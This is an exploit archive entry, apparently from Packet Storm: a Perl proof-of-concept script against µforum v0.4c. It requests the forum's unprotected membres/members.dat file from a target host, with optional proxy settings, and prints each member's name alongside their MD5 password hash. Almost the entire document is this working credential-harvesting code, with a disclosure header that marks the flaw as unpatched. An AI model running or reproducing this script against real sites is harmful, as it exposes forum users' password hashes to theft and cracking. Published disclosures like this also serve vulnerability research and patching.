forum version 0.4c members.dat MD5 password hash disclosure proof of concept exploit.
7d49d4f3ab28e7b4c16ef4ca1a0c387b4c3265130e1a3e5db77d7c9f8ca0d54f#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;
print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";
my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);
if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host !~ /http/) {$host = 'http://'.$host;}
my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;
my $req = HTTP::Request->new('GET', $host);
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $res = $ua->request($req);
my $dat = $res->content;
my @tabl= split(/:/, $dat);
foreach (@tabl) {
if($_ =~ /"(.*)";a/){
print "\n".$1.'::';}
if($_ =~ /"([a-z0-9]{32})";i/){
print $1;}
}
print "\n";
exit(0);
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed